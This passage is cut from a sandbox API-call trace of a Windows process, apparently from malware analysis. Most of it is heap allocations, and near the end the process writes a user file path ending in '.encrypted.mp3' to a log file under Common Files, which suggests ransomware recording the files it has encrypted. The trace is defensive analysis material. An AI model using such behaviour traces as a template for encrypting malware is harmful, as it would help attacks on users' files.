wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.045] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.045] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0038.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.047] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0038.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.048] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x140) returned 0x7c50e0 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.049] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.049] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.050] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.050] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.050] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.050] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.050] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x23f2, lpOverlapped=0x0) returned 1 [0038.050] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.050] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x23f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.050] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.encrypted.mp3\r\n", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0038.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53) returned 0x794b90 [0038.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.encrypted.mp3\r\n", cchWideChar=83, lpMultiByteStr=0x794b90, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 83 [0038.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0038.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0038.050] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x52, lpOverlapped=0x0) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.051] CloseHandle (hObject=0x140) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0038.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 